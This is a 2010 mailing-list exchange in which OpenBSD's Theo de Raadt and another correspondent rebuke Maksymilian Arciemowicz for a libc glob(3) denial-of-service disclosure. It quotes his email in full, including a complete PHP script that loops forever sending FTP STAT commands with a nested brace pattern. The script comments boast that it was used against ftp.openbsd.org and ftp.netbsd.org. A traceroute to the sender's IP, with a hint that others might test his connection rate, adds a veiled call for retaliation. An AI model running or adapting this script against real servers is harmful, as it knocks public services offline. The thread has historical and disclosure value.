It's rather astonishing what attempts to pass for a credible security advisory today.

"oh, I made a lot of connections to the site and they blocked me."

Thank you, Maksymilian, for showing us all that you can execute a denial of service attack from 90.156.82.13. I wonder how many connections his site supports to his services. Perhaps some similar "security expert" can test his connection rate and let us all know.

# traceroute -n 90.156.82.13
traceroute to 90.156.82.13 (90.156.82.13), 64 hops max, 40 byte packets
 1  129.128.5.2  6.906 ms  0.818 ms  1.444 ms
 2  129.128.3.194  0.306 ms  0.303 ms  0.306 ms
 3  129.128.3.130  0.345 ms  0.502 ms  0.656 ms
 4  129.128.3.170  0.502 ms  0.726 ms  1.443 ms
 5  64.42.209.114  5.628 ms  5.562 ms  5.272 ms
 6  216.18.32.13  6.337 ms  5.676 ms  5.752 ms
 7  66.59.190.198  18.936 ms  19.18 ms  18.523 ms
 8  66.59.190.18  18.384 ms  18.659 ms  18.426 ms
 9  67.69.199.105  17.797 ms  17.785 ms  18.111 ms
10  64.86.115.13  17.369 ms  17.651 ms  17.175 ms
11  216.6.98.29  68.828 ms  69.162 ms  69.146 ms
12  216.6.57.9  87.943 ms  87.828 ms  87.879 ms
13  195.219.69.29  175.930 ms  176.47 ms  175.804 ms
14  195.219.69.2  189.366 ms  176.757 ms  179.460 ms
15  195.219.180.6  193.562 ms  197.755 ms  197.880 ms
16  195.219.246.2  181.461 ms  201.536 ms  179.635 ms
17  83.238.251.56  177.432 ms  177.971 ms  177.115 ms
18  83.238.250.38  189.741 ms  190.70 ms  189.646 ms
19  83.238.250.12  191.123 ms  193.99 ms  192.135 ms
20  83.238.251.41  189.843 ms  189.805 ms  189.245 ms
21  87.204.248.202  188.981 ms  189.167 ms  459.987 ms
22  87.99.33.90  190.739 ms  190.637 ms  190.955 ms
23  87.99.32.202  190.180 ms  190.271 ms  190.160 ms
24  90.156.82.13  289.39 ms  331.276 ms  319.419 ms
^C
# host 90.156.82.13
13.82.156.90.in-addr.arpa domain name pointer 90-156-82-13.magma-net.pl.
#

On 2 July 2010 15:47, Theo de Raadt <dera...@cvs.openbsd.org> wrote:
> OK, I am letting the maintainer of the site know, at the University Campus
> that you have just executed a denial of service against.
>
> I am surprised that you would go out of your way to declare so freely
> that you have purposely participated in a denial of service.
>
>> Return-Path: c...@securityreason.com
>> Delivery-Date: Fri Jul 2 15:38:24 2010
>> Received: from shear.ucar.edu (lists.openbsd.org [192.43.244.163])
>> by cvs.openbsd.org (8.14.3/8.12.1) with ESMTP id o62LcNgR016472
>> (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 verify=FAIL)
>> for <dera...@cvs.openbsd.org>; Fri, 2 Jul 2010 15:38:24 -0600 (MDT)
>> Received: from v117864.home.net.pl (v117864.home.net.pl [89.161.252.8])
>> by shear.ucar.edu (8.14.3/8.14.3) with SMTP id o62LcG20025931
>> for <dera...@openbsd.org>; Fri, 2 Jul 2010 15:38:17 -0600 (MDT)
>> Received: from 90-156-82-13.magma-net.pl [90.156.82.13] (HELO [127.0.0.1])
>> by securityreason.home.pl [89.161.252.8] with SMTP (IdeaSmtpServer v0.70)
>> id a6e20078b871f388; Fri, 2 Jul 2010 22:38:15 +0200
>> Message-ID: <4c2e4e40.4080...@securityreason.com>
>> Date: Fri, 02 Jul 2010 22:38:24 +0200
>> From: Maksymilian Arciemowicz <c...@securityreason.com>
>> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.10) Gecko/20100512 Thunderbird/3.0.5
>> MIME-Version: 1.0
>> To: dera...@openbsd.org, secur...@openbsd.org
>> Subject: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org
>> X-Enigmail-Version: 1.0.1
>> Content-Type: text/plain; charset=ISO-8859-1
>> Content-Transfer-Encoding: 7bit
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> <?php
>>
>> /* Libc/glob(3) denial-of-service
>> Maksymilian Arciemowicz from SecurityReason.com
>>
>> This script has been used to attack ftp.openbsd.org and ftp.netbsd.org
>>
>> Result (ftp.openbsd.org):
>> - - Connection refused
>>
>> and in the end
>>
>> # telnet ftp.openbsd.org 21
>> Trying 129.128.5.191...
>> Connected to ftp.openbsd.org.
>> Escape character is '^]'.
>> 421- If you are seeing this message you have been blocked from using
>> 421- this ftp server - most likely for mirroring content without paying
>> 421- attention to what you were mirroring or where you should be mirroring
>> 421- it from, or for excessive connection rates.
>> 421- OpenBSD should *NOT* be mirrored from here, you should use
>> 421- a second level mirror as described in http://www.openbsd.org/ftp.html
>> 421
>>
>> Connection closed by foreign host.
>> #
>>
>> ;]
>>
>> Result (ftp.netbsd.org):
>> - - no more access for anonymous
>>
>> On 02.07.2010 20:29 CET, ftp.netbsd.org has returned:
>> 530 User ftp access denied, connection limit of 160 reached.
>>
>>
>> After attack from one host
>>
>> */
>>
>> $conf['host']= $argv[1] ? $argv[1] : "HOST";
>> $conf['user'] =$argv[2] ? $argv[2] : "anonymous";
>> $conf['pass'] =$argv[3] ? $argv[3] : "m...@cxib.net";
>> $conf['port']= $argv[4] ? $argv[4] : 21;
>>
>> $dirnames=array('A', 'B', 'C', 'D',
>> 'E','F','G','H','I','J','K','M','N','O','P');
>> $pathsent="{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{ ..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*c x";
>>
>> // fts_levelsumary
>> $fts_level=2;
>>
>> $created_directories=true;
>>
>> function attackglobinftp(){
>>     global $conf;
>>     global $dirnames;
>>     global $pathsent;
>>     global $fts_level;
>>     global $created_directories;
>>
>>     if (isset($conf['port']) and
>>         ($socket=socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) and
>>         (socket_connect($socket, $conf['host'], $conf['port']))){
>>
>>         echo "New connection opened\n";
>>         socket_write($socket, "USER ".$conf['user']."\nPASS ".$conf['pass']."\n");
>>
>>         if(!$created_directories)
>>             for($stagc=0;$stagc < count($dirnames);$stagc++){
>>                 for($ssdc=2;$ssdc--;){
>>                     socket_write($socket, "MKD ".$dirnames[$stagc]."\nCWD
>> ".$dirnames[$stagc]."\n");
>>                     echo "MKD ".$dirnames[$stagc]."\nCWD ".$dirnames[$stagc]." for \n";
>>                     echo socket_read($socket,10204);
>>                     echo $ssdc."\n";
>>                 }
>>                 for($ssdc=256;$ssdc--;){
>>                     socket_write($socket, "cwd ..\n");
>>                     echo socket_read($socket,10000);
>>                 }
>>             }
>>         $created_directories=true;
>>
>>
>>         for($aoi=1; $aoi--;
>>         ){
>>             socket_write($socket, "STAT ".$pathsent."\n");
>>             echo "sent: STAT ".$pathsent."s\n";
>>         }
>>         sleep(5);
>>     } else
>>         echo "Unable to connect\n";
>>
>> }
>>
>> while(1)
>>     attackglobinftp();
>> ?>
>>
>>
>> - --
>> Best Regards,
>> - ------------------------
>> pub 1024D/A6986BD6 2008-08-22
>> uid Maksymilian Arciemowicz (cxib)
>> <c...@securityreason.com>
>> sub 4096g/0889FA9A 2008-08-22
>>
>> http://securityreason.com
>> http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
>> -----BEGIN PGP SIGNATURE-----
>>
>> iEYEARECAAYFAkwuTkAACgkQpiCeOKaYa9aafQCeNCpKgH3qFz0HscgNJ/JEunyS
>> I0EAnAxEcaMFSq4Kl0x3NSqzeuV1SP3p
>> =lx/r
>> -----END PGP SIGNATURE-----